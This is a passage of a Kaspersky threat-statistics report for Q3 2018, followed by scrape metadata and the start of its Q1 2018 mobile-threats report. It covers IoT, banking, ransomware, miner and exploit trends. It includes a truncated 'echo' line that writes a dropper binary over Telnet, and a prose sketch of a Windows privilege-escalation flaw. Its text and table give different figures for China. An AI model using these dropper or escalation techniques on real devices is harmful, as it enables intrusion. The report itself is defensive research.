_Geography of IP addresses of devices from which attacks were attempted on Kaspersky Lab honeypots, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151529/it-threat-evolution-q3-2018-statistics_09_en.png>)

**TOP 10 countries hosting devices that were sources of attacks targeting Kaspersky Lab honeypots.**

| | Country | %* |
|---|---|---|
| 1 | China | 27.15% |
| 2 | Brazil | 10.57% |
| 3 | Russia | 7.87% |
| 4 | Egypt | 7.43% |
| 5 | USA | 4.47% |
| 6 | South Korea | 3.57% |
| 7 | India | 2.59% |
| 8 | Taiwan | 2.17% |
| 9 | Turkey | 1.82% |
| 10 | Italy | 1.75% |

_* Infected devices in each country as a percentage of the global number of IoT devices that attack via Telnet._

In Q3, China (23.15%) became the leader in terms of the number of unique IP addresses directing attacks against Kaspersky Lab honeypots. Brazil (10.57%) came second, after leading the rating in Q2. Russia (7.87%) was third.

Successful Telnet attacks saw the threat actors download Trojan-Downloader.Linux.NyaDrop.b (62.24%) most often. This piece of malware is remarkable in that it contains shellcode that downloads other malware from the same source computer that has just infected the victim IoT device. The shellcode doesn't require any utilities – it performs all the necessary actions within itself using system calls. In other words, NyaDrop is a kind of universal soldier, capable of performing its tasks irrespective of the environment it has been launched in.

It was the Trojans of the family Backdoor.Linux.Hajime that downloaded NyaDrop most frequently, because this is a very convenient self-propagation method for Hajime. The flow chart in this case is of particular interest:

 1. 
After successfully infecting a device, Hajime scans the network to find new victims.
 2. As soon as a suitable device is found, the lightweight NyaDrop (just 480 bytes) is downloaded to it.
 3. NyaDrop contacts the device that was the infection source and slowly downloads Hajime, which is much larger.

All these actions are only required because it's quite a challenge to download files via Telnet, though it is possible to execute commands. For example, this is what creating a NyaDrop file looks like (the command is truncated; the full version continues with the remaining bytes of the binary and redirects the output into a file):

    echo -ne "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00..."

480 bytes can be sent this way, but sending 60 KB becomes problematic.

**TOP 10 malware downloaded to infected IoT devices in successful Telnet attacks**

| | Verdicts | %* |
|---|---|---|
| 1 | Trojan-Downloader.Linux.NyaDrop.b | 62.24% |
| 2 | Backdoor.Linux.Mirai.ba | 16.31% |
| 3 | Backdoor.Linux.Mirai.b | 12.01% |
| 4 | Trojan-Downloader.Shell.Agent.p | 1.53% |
| 5 | Backdoor.Linux.Mirai.c | 1.33% |
| 6 | Backdoor.Linux.Gafgyt.ay | 1.15% |
| 7 | Backdoor.Linux.Mirai.au | 0.83% |
| 8 | Backdoor.Linux.Gafgyt.bj | 0.61% |
| 9 | Trojan-Downloader.Linux.Mirai.d | 0.51% |
| 10 | Backdoor.Linux.Mirai.bj | 0.37% |

_* Proportion of downloads of each specific malicious program to IoT devices in successful Telnet attacks as a percentage of all malware downloads in such attacks._

The rating did not differ much from the previous quarter: half of the top 10 is occupied by different modifications of Mirai, which is the most widespread IoT malware program to date.

## Financial threats

### Q3 events

The banking Trojan DanaBot that was detected in Q2 continued to develop rapidly in Q3. A new modification included not only an updated C&C/bot communication protocol but also an extended list of organizations targeted by the malware.
Its prime targets in Q2 were located in Australia and Poland, but in Q3 organizations from Austria, Germany and Italy were also included.\n\nTo recap, DanaBot has a modular structure and is capable of loading extra modules to intercept traffic and steal passwords and crypto wallets. The Trojan spread via spam messages containing a malicious office document, which subsequently loaded the Trojan's main body.\n\n### Financial threat statistics\n\nIn Q3 2018, Kaspersky Lab solutions blocked attempts to launch one or more malicious programs designed to steal money from bank accounts on the computers of 305,315 users.\n\n_Number of unique users attacked by financial malware, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151555/it-threat-evolution-q3-2018-statistics_10_en.png>)\n\n#### Geography of attacks\n\nTo evaluate and compare the risk of being infected by banking Trojans and ATM/POS malware worldwide, we calculated the share of users of Kaspersky Lab products in each country that faced this threat during the reporting period out of all users of our products in that country.\n\n_Geography of banking malware attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151629/it-threat-evolution-q3-2018-statistics_11_en.png>)\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Germany | 3.0 \n2 | South Korea | 2.8 \n3 | Greece | 2.3 \n4 | Malaysia | 2.1 \n5 | Serbia | 2.0 \n6 | United Arab Emirates | 1.9 \n7 | Portugal | 1.9 \n8 | Lithuania | 1.9 \n9 | Indonesia | 1.8 \n10 | Cambodia | 1.8 \n \n_* Countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000) are excluded._ \n_** Unique users attacked by mobile banking Trojans in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in that country._\n\n**TOP 10 banking malware families**\n\n| Name | Verdicts | %* 
\n---|---|---|--- \n1 | Zbot | Trojan.Win32.Zbot | 25.8 | \n2 | Nymaim | Trojan.Win32.Nymaim | 18.4 | \n3 | SpyEye | Backdoor.Win32.SpyEye | 18.1 | \n4 | RTM | Trojan-Banker.Win32.RTM | 9.2 | \n5 | Emotet | Backdoor.Win32.Emotet | 5.9 | \n6 | Neurevt | Trojan.Win32.Neurevt | 4.7 | \n7 | Tinba | Trojan-Banker.Win32.Tinba | 2.8 | \n8 | NeutrinoPOS | Trojan-Banker.Win32.NeutrinoPOS | 2.4 | \n9 | Gozi | Trojan.Win32.Gozi | 1.6 | \n10 | Trickster | Trojan.Win32.Trickster | 1.4 | \n \n_* Unique users attacked by the given malware as a percentage of all users that were attacked by banking threats._\n\nIn Q3 2018, there were three newcomers to this TOP 10: Trojan.Win32.Trickster (1.4%), Trojan-Banker.Win32.Tinba (2.8%) and Trojan-Banker.Win32.RTM (9.2%). The latter shot to fourth place thanks to a mass mailing campaign in mid-July that involved emails with malicious attachments and links.\n\nOverall, the TOP 3 remained the same, though Trojan.Win32.Nymaim ceded some ground \u2013 from 27% in Q2 to 18.4% in Q3 \u2013 and fell to second.\n\n## Cryptoware programs\n\n### Q3 events\n\nIn early July, Kaspersky Lab experts detected an unusual modification of the notorious Rakhni Trojan. What drew the analysts' attention was that in some cases the downloader now delivers a [miner](<https://securelist.com/to-crypt-or-to-mine-that-is-the-question/86307/>) instead of ransomware as was always the case with this malware family in the past.\n\nAugust saw the detection of the rather unusual [KeyPass](<https://securelist.com/keypass-ransomware/87412/>) ransomware. Its creators apparently decided to make provisions for all possible infection scenarios \u2013 via spam, with the help of exploit packs, and via manual brute-force attacks on the passwords of the remote access system, after which the Trojan is launched. 
The KeyPass Trojan can run in both hidden mode and GUI mode so the threat actor can configure encryption parameters.\n\nMeanwhile, law enforcement agencies continue their systematic battle against ransomware. Following several years of investigations, two cybercriminals who distributed the [CoinVault](<https://securelist.com/coinvault-are-we-reaching-the-end-of-the-nightmare/72187/>) ransomware [were found guilty](<https://securelist.com/coinvault-the-court-case/86503/>) in the Netherlands.\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3, the number of detected cryptoware modifications was significantly lower than in Q2 and close to that of Q1.\n\n_ Number of new cryptoware modifications, Q4 2017 \u2013 Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151203/it-threat-evolution-q3-2018-statistics_12.png>)\n\n#### Number of users attacked by Trojan cryptors\n\nIn Q3 2018, Kaspersky Lab products protected 259,867 unique KSN users from Trojan cryptors. The total number of attacked users rose both against Q2 and on a month-on-month basis during Q3. 
In September, we observed a significant rise in the number of attempted infections, which appears to correlate with people returning from seasonal vacations.\n\n_Number of unique users attacked by Trojan cryptors, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151654/it-threat-evolution-q3-2018-statistics_13_en.png>)\n\n#### Geography of attacks\n\n_Geography of Trojan cryptors attacks, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151726/it-threat-evolution-q3-2018-statistics_14_en.png>)\n\n**TOP 10 countries attacked by Trojan cryptors**\n\n| Country* | %** \n---|---|--- \n1 | Bangladesh | 5.80 \n2 | Uzbekistan | 3.77 \n3 | Nepal | 2.18 \n4 | Pakistan | 1.41 \n5 | India | 1.27 \n6 | Indonesia | 1.21 \n7 | Vietnam | 1.20 \n8 | Mozambique | 1.06 \n9 | China | 1.05 \n10 | Kazakhstan | 0.84 \n \n_* Countries with relatively few Kaspersky Lab users (under 50,000) are excluded._ \n_** Unique users whose computers were attacked by Trojan cryptors as a percentage of all unique users of Kaspersky Lab products in that country._\n\nMost of the places in this rating are occupied by Asian countries. Bangladesh tops the list with 5.8%, followed by Uzbekistan (3.77%) and the newcomer Nepal (2.18%) in third. 
Pakistan (1.41%) came fourth, while China (1.05%) fell from sixth to ninth and Vietnam (1.20%) fell four places to seventh.\n\n**TOP 10 most widespread cryptor families**\n\n| Name | Verdicts | %* \n---|---|---|--- \n1 | WannaCry | Trojan-Ransom.Win32.Wanna | 28.72% | \n2 | (generic verdict) | Trojan-Ransom.Win32.Phny | 13.70% | \n3 | GandCrab | Trojan-Ransom.Win32.GandCrypt | 12.31% | \n4 | Cryakl | Trojan-Ransom.Win32.Cryakl | 9.30% | \n5 | (generic verdict) | Trojan-Ransom.Win32.Gen | 2.99% | \n6 | (generic verdict) | Trojan-Ransom.Win32.Cryptor | 2.58% | \n7 | PolyRansom/VirLock | Virus.Win32.PolyRansom | 2.33% | \n8 | Shade | Trojan-Ransom.Win32.Shade | 1.99% | \n9 | Crysis | Trojan-Ransom.Win32.Crusis | 1.70% | \n10 | (generic verdict) | Trojan-Ransom.Win32.Encoder | 1.70% | \n \n_* Unique Kaspersky Lab users attacked by a specific family of Trojan cryptors as a percentage of all users attacked by Trojan cryptors._\n\nThe leading 10 places are increasingly occupied by generic verdicts, suggesting widespread cryptors are effectively detected by automatic intelligent systems. WannaCry (28.72%) still leads the way among specific cryptoware families. This quarter saw two new versions of the Trojan GandCrab (12.31%) emerge, meaning it remained in the most widespread ransomware rating. Among the old-timers that remained in the TOP 10 were PolyRansom, Cryakl, Shade, and Crysis, while Cerber and Purgen failed to gain much distribution this quarter.\n\n## Cryptominers\n\n_As we already reported in [Ransomware and malicious cryptominers in 2016-2018](<https://securelist.com/ransomware-and-malicious-crypto-miners-in-2016-2018/86238/>), ransomware is gradually declining and being replaced with cryptocurrency miners. Therefore, this year we decided to start publishing quarterly reports on the status of this type of threat. 
At the same time, we began using a broader range of verdicts as a basis for collecting statistics on miners, so the statistics in this year's quarterly reports may not be consistent with the data from our earlier publications. _\n\n### Statistics\n\n#### Number of new modifications\n\nIn Q3 2018, Kaspersky Lab solutions detected 31,991 new modifications of miners.\n\n_Number of new miner modifications, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151750/it-threat-evolution-q3-2018-statistics_15_en.png>)\n\n#### Number of users attacked by cryptominers\n\nIn Q3, Kaspersky Lab products detected mining programs on the computers of 1,787,994 KSN users around the world.\n\n_Number of unique users attacked by cryptominers, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151816/it-threat-evolution-q3-2018-statistics_16_en.png>)\n\nCryptomining activity in September was comparable to that of June 2018, though we observed an overall downward trend in Q3.\n\n#### Geography of attacks\n\n_Geography of cryptominers, Q3 2018 (download)_\n\n**TOP 10 countries by percentage of attacked users**\n\n| Country* | %** \n---|---|--- \n1 | Afghanistan | 16.85% \n2 | Uzbekistan | 14.23% \n3 | Kazakhstan | 10.17% \n4 | Belarus | 9.73% \n5 | Vietnam | 8.96% \n6 | Indonesia | 8.80% \n7 | Mozambique | 8.50% \n8 | Ukraine | 7.60% \n9 | Tanzania | 7.51% \n10 | Azerbaijan | 7.13% \n \n_* Countries with relatively few Kaspersky Lab product users (under 50,000) are excluded._ \n_** Unique Kaspersky Lab users whose computers were targeted by miners as a percentage of all unique users of Kaspersky Lab products in the country._\n\n## Vulnerable apps used by cybercriminals\n\nThe distribution of platforms most often targeted by exploits showed very little change from Q2. 
Microsoft Office applications (70%) are still the most frequently targeted \u2013 five times more than web browsers, the second most attacked platform.\n\nAlthough quite some time has passed since security patches were released for the two vulnerabilities most often used in cyberattacks \u2013 CVE-2017-11882 and CVE-2018-0802 \u2013 the exploits targeting the Equation Editor component still remain the most popular for sending malicious spam messages.\n\nAn exploit targeting the vulnerability [CVE-2018-8373](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8373>) in the VBScript engine (which was patched in late August) was detected in the wild and affected Internet Explorer 9\u201311. However, we are currently observing only limited use of this vulnerability by cybercriminals. This is most probably due to Internet Explorer not being very popular, as well as the fact that VBScript execution is disabled by default in recent versions of Windows 10.\n\n_Distribution of exploits used by cybercriminals, by type of attacked application, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151232/it-threat-evolution-q3-2018-statistics_18.png>)\n\nQ3 was also marked by the emergence of two atypical 0-day vulnerabilities \u2013 [CVE-2018-8414](<https://portal.msrc.microsoft.com/en-us/security-guidance/advisory/CVE-2018-8414>) and [CVE-2018-8440](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8440>). 
They are peculiar because information about the existence of these vulnerabilities, along with detailed descriptions and all the files required to reproduce them, was leaked to the public domain long before official patches were released for them.\n\nIn the case of CVE-2018-8414, [an article](<https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39>) was published back in June with a detailed description of how SettingContent-ms files can be used to execute arbitrary code in Windows. However, the security patch to fix this vulnerability was only released in Q3, one month after the article became publicly available and active exploitation of the vulnerability had already begun. The researchers who described this technique reported it to Microsoft, but initially it was not recognized as a vulnerability requiring a patch. Microsoft reconsidered after cybercriminals began actively using these files to deliver malicious payloads, and a patch was released on July 14. According to KSN statistics, the SettingContent-ms files didn't gain much popularity among cybercriminals, and after the security patch was released, their use ceased altogether. \n\nAnother interesting case was the CVE-2018-8440 vulnerability. Just like in the case above, all the information required for reproduction was deliberately published by a researcher, and threat actors naturally took advantage. CVE-2018-8440 is a privilege-escalation vulnerability, allowing an attacker to escalate their privilege in the system to the highest level \u2013 System. The vulnerability is based on how Windows processes a task scheduler advanced local procedure call (ALPC). The vulnerable ALPC procedure makes it possible to change the discretionary access control list (DACL) for files located in a directory that doesn't require special privileges to access. 
To escalate privileges, the attacker exploits the vulnerability in the ALPC to change access rights to a system file, and then that system file is overwritten by an unprivileged user. \n\n## Attacks via web resources\n\n_The statistics in this chapter are based on Web Anti-Virus, which protects users when malicious objects are downloaded from malicious/infected web pages. Malicious websites are created by cybercriminals, while web resources with user-created content (for example, forums), as well as hacked legitimate resources, can be infected._\n\n### Countries where online resources are seeded with malware\n\n_The following statistics are based on the physical location of the online resources used in attacks and blocked by our antivirus components (web pages containing redirects to exploits, sites containing exploits and other malware, botnet command centers, etc.). Any unique host could be the source of one or more web attacks. In order to determine the geographical source of web-based attacks, domain names are matched against their actual domain IP addresses, and then the geographical location of a specific IP address (GEOIP) is established._\n\nIn the third quarter of 2018, Kaspersky Lab solutions blocked **947,027,517** attacks launched from web resources located in 203 countries around the world. **246,695,333** unique URLs were recognized as malicious by web antivirus components.\n\n_Distribution of web attack sources by country, Q3 2018_ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151845/it-threat-evolution-q3-2018-statistics_19_en.png>)\n\nIn Q3, the USA (52.81%) was home to most sources of web attacks. 
Overall, the leading four sources of web attacks remained unchanged from Q2: the USA is followed by the Netherlands (16.26%), Germany (6.94%) and France (4.4%).\n\n### Countries where users faced the greatest risk of online infection\n\nTo assess the risk of online infection faced by users in different countries, we calculated the percentage of Kaspersky Lab users on whose computers Web Anti-Virus was triggered in each country during the quarter. The resulting data provides an indication of the aggressiveness of the environment in which computers operate in different countries.\n\nThis rating only includes attacks by _malware-class_ malicious programs; it does not include Web Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Venezuela | 35.88 \n2 | Albania | 32.48 \n3 | Algeria | 32.41 \n4 | Belarus | 31.08 \n5 | Armenia | 29.16 \n6 | Ukraine | 28.67 \n7 | Moldova | 28.64 \n8 | Azerbaijan | 26.67 \n9 | Kyrgyzstan | 25.80 \n10 | Serbia | 25.38 \n11 | Mauritania | 24.89 \n12 | Indonesia | 24.68 \n13 | Romania | 24.56 \n14 | Qatar | 23.99 \n15 | Kazakhstan | 23.93 \n16 | Philippines | 23.84 \n17 | Lithuania | 23.70 \n18 | Djibouti | 23.70 \n19 | Latvia | 23.09 \n20 | Honduras | 22.97 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users targeted by malware-class attacks as a percentage of all unique users of Kaspersky Lab products in the country._\n\nOn average, 18.92% of internet users' computers worldwide experienced at least one _malware-class_ web attack.\n\n_Geography of malicious web attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151916/it-threat-evolution-q3-2018-statistics_20_en.png>)\n\n## Local threats\n\n_Local infection statistics for user computers are an important indicator: they reflect threats that have penetrated computer systems by infecting files or 
via removable media, or initially got on the computer in an encrypted format (for example, programs integrated in complex installers, encrypted files, etc.)._\n\n_Data in this section is based on analyzing statistics produced by antivirus scans of files on the hard drive at the moment they were created or accessed, and the results of scanning removable storage media. Analysis takes account of the malicious programs identified on user computers or on removable media connected to computers \u2013 flash drives, camera memory cards, phones and external hard drives._\n\nIn Q3 2018, Kaspersky Lab's file antivirus detected **239,177,356** unique malicious and potentially unwanted objects.\n\n### Countries where users faced the highest risk of local infection\n\nFor each country, we calculated the percentage of Kaspersky Lab product users on whose computers File Anti-Virus was triggered during the reporting period. These statistics reflect the level of personal computer infection in different countries.\n\nThe rating includes only malware-class attacks. 
It does not include File Anti-Virus detections of potentially dangerous or unwanted programs such as RiskTool or adware.\n\n| Country* | %** \n---|---|--- \n1 | Uzbekistan | 54.93 \n2 | Afghanistan | 54.15 \n3 | Yemen | 52.12 \n4 | Turkmenistan | 49.61 \n5 | Tajikistan | 49.05 \n6 | Laos | 47.93 \n7 | Syria | 47.45 \n8 | Vietnam | 46.07 \n9 | Bangladesh | 45.93 \n10 | Sudan | 45.30 \n11 | Ethiopia | 45.17 \n12 | Myanmar | 44.61 \n13 | Mozambique | 42.65 \n14 | Kyrgyzstan | 42.38 \n15 | Iraq | 42.25 \n16 | Rwanda | 42.06 \n17 | Algeria | 41.95 \n18 | Cameroon | 40.98 \n19 | Malawi | 40.70 \n20 | Belarus | 40.66 \n \n_* Countries with relatively few Kaspersky Lab users (under 10,000) are excluded._ \n_** Unique users on whose computers **malware-class** local threats were blocked, as a percentage of all unique users of Kaspersky Lab products in the country.\n\n_Geography of local malware attacks in Q3 2018 _ [(download)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/11/09151949/it-threat-evolution-q3-2018-statistics_21_en.png>)\n\nOn average, 22.53% of computers globally faced at least one malware-class local threat in Q3.", "cvss3": {}, "published": "2018-11-12T10:00:55", "type": "securelist", "title": "IT threat evolution Q3 2018. 
Statistics", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2017-11882", "CVE-2018-0802", "CVE-2018-8373", "CVE-2018-8414", "CVE-2018-8440"], "modified": "2018-11-12T10:00:55", "id": "SECURELIST:2E379BD626ECA8E38B18EDCA6CD22F3C", "href": "https://securelist.com/it-threat-evolution-q3-2018-statistics/88689/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-05-15T21:13:49", "description": "\n\n## Q1 figures\n\nAccording to KSN: \n\n * Kaspersky Lab solutions blocked 796,806,112 attacks launched from online resources located in 194 countries across the globe.\n * 282,807,433 unique URLs were recognized as malicious by Web Anti-Virus components.\n * Attempted infections by malware designed to steal money via online access to bank accounts were logged on the computers of 204,448 users.\n * Ransomware attacks were registered on the computers of 179,934 unique users.\n * Our File Anti-Virus logged 187,597,494 unique malicious and potentially unwanted objects.\n * Kaspersky Lab products for mobile devices detected: \n * 1,322,578 malicious installation packages\n * 18,912 installation packages for mobile banking Trojans\n * 8,787 installation packages for mobile ransomware Trojans\n\n## Mobile threats\n\n### Q1 events\n\nIn Q1 2018, DNS-hijacking, a new in-the-wild method for spreading mobile malware on Android devices, was identified. As a result of hacked routers and modified DNS settings, users were redirected to IP addresses belonging to the cybercriminals, where they were prompted to download malware disguised, for example, as browser updates. 
That is how the Korean banking Trojan Wroba was [distributed](<https://securelist.com/roaming-mantis-uses-dns-hijacking-to-infect-android-smartphones/85178/>).\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171226/180511-it-threats-q1-18-statistics-1.png>)\n\n_This malicious resource shows a fake window while displaying the legitimate site in the address bar_\n\nIt wasn't a [drive-by-download](<https://securelist.com/threats/drive-by-attack-glossary/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>) case, since the success of the attack largely depended on actions by the victim, such as installing and running the Trojan. But it's interesting to note that some devices (routers) were used to attack other devices (smartphones), all sprinkled with social engineering to make it more effective.\n\nHowever, a far greater splash in Q1 was caused by the creators of a seemingly legitimate app called GetContact.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171508/180511-it-threats-q1-18-statistics-21.png>)\n\nSome backstory to begin with. Various families and classes of malicious apps are known to gather data from infected devices: it could be a relatively harmless IMEI number, phone book contents, SMS correspondence, or even WhatsApp chats. All the above (and much more besides) is personal information that only the mobile phone owner should have control over. However, the creators of GetContact concocted a license agreement giving them the right to download the user's phone book to their servers and grant all their subscribers access to it. As a result, anyone could find out what name GetContact users had saved their phone number under, often with sad consequences. 
Let's hope that the app creators had the noble intention of [protecting users from telephone spam and fraudulent calls](<https://callerid.kaspersky.com/?lang=ru>), but simply chose the wrong means to do so.\n\n### Mobile threat statistics\n\nIn Q1 2018, Kaspersky Lab detected 1,322,578 malicious installation packages, down 11% against the previous quarter.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171235/180511-it-threats-q1-18-statistics-4.png>)\n\n_Number of detected malicious installation packages, Q2 2017 \u2013 Q1 2018_\n\n#### Distribution of detected mobile apps by type\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171244/180511-it-threats-q1-18-statistics-5.png>)\n\n_Distribution of newly detected mobile apps by type, Q4 2017 and Q1 2018 _\n\nAmong all the threats detected in Q1 2018, the lion's share belonged to potentially unwanted RiskTool apps (49.3%); compared to the previous quarter, their share fell by 5.5%. Members of the RiskTool.AndroidOS.SMSreg family contributed most to this indicator.\n\nSecond place was taken by Trojan-Dropper threats (21%), whose share doubled. Most detected files of this type came from the Trojan-Dropper.AndroidOS.Piom family.\n\nAdvertising apps, which ranked second in Q4 2017, dropped a place\u2014their share decreased by 8%, accounting for 11% of all detected threats.\n\nOn a separate note, Q1 saw a rise in the share of mobile banking threats. 
This was due to the mass distribution of Trojan-Banker.AndroidOS.Faketoken.z.\n\n#### TOP 20 mobile malware\n\n_Note that this malware rating does not include potentially dangerous or unwanted programs such as RiskTool and Adware._\n\n | Verdict | %* \n---|---|--- \n1 | DangerousObject.Multi.Generic | 70.17 \n2 | Trojan.AndroidOS.Boogr.gsh | 12.92 \n3 | Trojan.AndroidOS.Agent.rx | 5.55 \n4 | Trojan-Dropper.AndroidOS.Lezok.p | 5.23 \n5 | Trojan-Dropper.AndroidOS.Hqwar.ba | 2.95 \n6 | Trojan.AndroidOS.Triada.dl | 2.94 \n7 | Trojan-Dropper.AndroidOS.Hqwar.i | 2.51 \n8 | Trojan.AndroidOS.Piom.rfw | 2.13 \n9 | Trojan-Dropper.AndroidOS.Lezok.t | 2.06 \n10 | Trojan.AndroidOS.Piom.pnl | 1.78 \n11 | Trojan-Dropper.AndroidOS.Agent.ii | 1.76 \n12 | Trojan-SMS.AndroidOS.FakeInst.ei | 1.64 \n13 | Trojan-Dropper.AndroidOS.Hqwar.gen | 1.50 \n14 | Trojan-Ransom.AndroidOS.Zebt.a | 1.48 \n15 | Trojan.AndroidOS.Piom.qmx | 1.47 \n16 | Trojan.AndroidOS.Dvmap.a | 1.40 \n17 | Trojan-SMS.AndroidOS.Agent.xk | 1.35 \n18 | Trojan.AndroidOS.Triada.snt | 1.24 \n19 | Trojan-Dropper.AndroidOS.Lezok.b | 1.22 \n20 | Trojan-Dropper.AndroidOS.Tiny.d | 1.22 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked._\n\nAs before, first place in our TOP 20 went to DangerousObject.Multi.Generic (70.17%), the verdict we use for malware detected [using cloud technologies](<https://www.kaspersky.com/enterprise-security/wiki-section/products/big-data-the-astraea-technology>). Cloud technologies work when the anti-virus databases lack data for detecting a piece of malware, but the cloud of the anti-virus company already contains information about the object. This is basically how the latest malicious programs are detected.\n\nIn second place was Trojan.AndroidOS.Boogr.gsh (12.92%). 
This verdict is given to files recognized as malicious by our system based on [machine learning](<https://www.kaspersky.com/enterprise-security/wiki-section/products/machine-learning-in-cybersecurity>).\n\nThird was Trojan.AndroidOS.Agent.rx (5.55%). Operating in background mode, this Trojan's task is to covertly visit web pages as instructed by its C&C.\n\nFourth and fifth places went to the Trojan _matryoshkas_ Trojan-Dropper.AndroidOS.Lezok.p (5.2%) and Trojan-Dropper.AndroidOS.Hqwar.ba (2.95%), respectively. Note that in Q1 threats like Trojan-Dropper effectively owned the TOP 20, occupying eight positions in the rating. The main tasks of such droppers are to drop a payload on the victim, avoid detection by security software, and complicate the reverse engineering process. In the case of Lezok, an aggressive advertising app acts as the payload, while Hqwar can conceal a banking Trojan or ransomware.\n\nSixth place in the rating was taken by the unusual Trojan Triada.dl (2.94%) from the [Trojan.AndroidOS.Triada](<https://threats.kaspersky.com/en/threat/Trojan.AndroidOS.Triada/>) family of modular-designed malware, which we have written about many times. The Trojan was notable for its highly sophisticated attack vector: it modified the main system library libandroid_runtime.so so that malicious code started when any debugging output was written to the system event log. Devices with the modified library ended up on store shelves, thus ensuring that the infection began early. The capabilities of Triada.dl are almost limitless: it can be embedded in apps already installed and pinch data from them, and it can show the user fake data in \"clean\" apps.\n\nThe Trojan ransomware Trojan-Ransom.AndroidOS.Zebt.a (1.48%) finished 14th. It features a quaint set of functions, including hiding the icon at startup and requesting device administrator rights to counteract deletion. 
Like other such mobile ransomware, the malware is distributed under the guise of a porn app.\n\nAnother interesting resident in the TOP 20 is Trojan-SMS.AndroidOS.Agent.xk (1.35%), which operates like the SMS Trojans of 2011. The malware displays a welcome screen offering various services, generally access to content. At the bottom in fine print it is written that the services are fee-based and subscription to them is via SMS.\n\n#### Geography of mobile threats\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171253/180511-it-threats-q1-18-statistics-6.png>)\n\n_Map of attempted infections using mobile malware in Q1 2018 (percentage of attacked users in the country)_\n\nTOP 10 countries by share of users attacked by mobile malware:\n\n | Country* | %** \n---|---|--- \n1 | China | 34.43 \n2 | Bangladesh | 27.53 \n3 | Nepal | 27.37 \n4 | Ivory Coast | 27.16 \n5 | Nigeria | 25.36 \n6 | Algeria | 24.13 \n7 | Tanzania | 23.61 \n8 | India | 23.27 \n9 | Indonesia | 22.01 \n10 | Kenya | 21.45 \n \n_* Excluded from the rating are countries with relatively few users of Kaspersky Lab's mobile antivirus (under 10,000). \n** Unique users attacked in the country as a percentage of all users of Kaspersky Lab's mobile antivirus in the country._\n\nIn Q1 2018, China (34.43%) topped the list by share of mobile users attacked. Note that China is a regular fixture in the TOP 10 rating by number of attacked users: It came sixth in 2017, and fourth in 2016. As in 2017, second place was claimed by Bangladesh (27.53%). 
The biggest climber was Nepal (27.37%), rising from ninth place last year to third.\n\nRussia (8.18%) this quarter was down in 39th spot, behind Qatar (8.22%) and Vietnam (8.48%).\n\nThe safest countries (based on proportion of mobile users attacked) are Denmark (1.85%) and Japan (1%).\n\n#### Mobile banking Trojans\n\nIn the reporting period, we detected **18,912** installation packages for mobile banking Trojans, which is 1.3 times more than in Q4 2017.\n\n[](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/05/11171304/180511-it-threats-q1-18-statistics-7.png>)\n\n_Number of installation packages for mobile banking Trojans detected by Kaspersky Lab, Q2 2017 \u2013 Q1 2018_\n\n| Verdict | %* \n---|---|--- \n1 | Trojan-Banker.AndroidOS.Asacub.bj | 12.36 \n2 | Trojan-Banker.AndroidOS.Svpeng.q | 9.17 \n3 | Trojan-Banker.AndroidOS.Asacub.bk | 7.82 \n4 | Trojan-Banker.AndroidOS.Svpeng.aj | 6.63 \n5 | Trojan-Banker.AndroidOS.Asacub.e | 5.93 \n6 | Trojan-Banker.AndroidOS.Hqwar.t | 5.38 \n7 | Trojan-Banker.AndroidOS.Faketoken.z | 5.15 \n8 | Trojan-Banker.AndroidOS.Svpeng.ai | 4.54 \n9 | Trojan-Banker.AndroidOS.Agent.di | 4.31 \n10 | Trojan-Banker.AndroidOS.Asacub.ar | 3.52 \n \n_* Unique users attacked by the relevant malware as a percentage of all users of Kaspersky Lab's mobile antivirus that were attacked by banking threats._\n\nThe most popular mobile banking Trojan in Q1 was Asacub.bj (12.36%), nudging ahead of second-place Svpeng.q (9.17%). Both these Trojans use phishing windows to steal bank card and authentication data for online banking. They also steal money through SMS services, including mobile banking.\n\nNote that the TOP 10 mobile banking threats in Q1 is largely made up of members of the Asacub (4 out of 10) and Svpeng (3 out of 10) families. However, Trojan-Banker.AndroidOS.Faketoken.z also entered the list. 
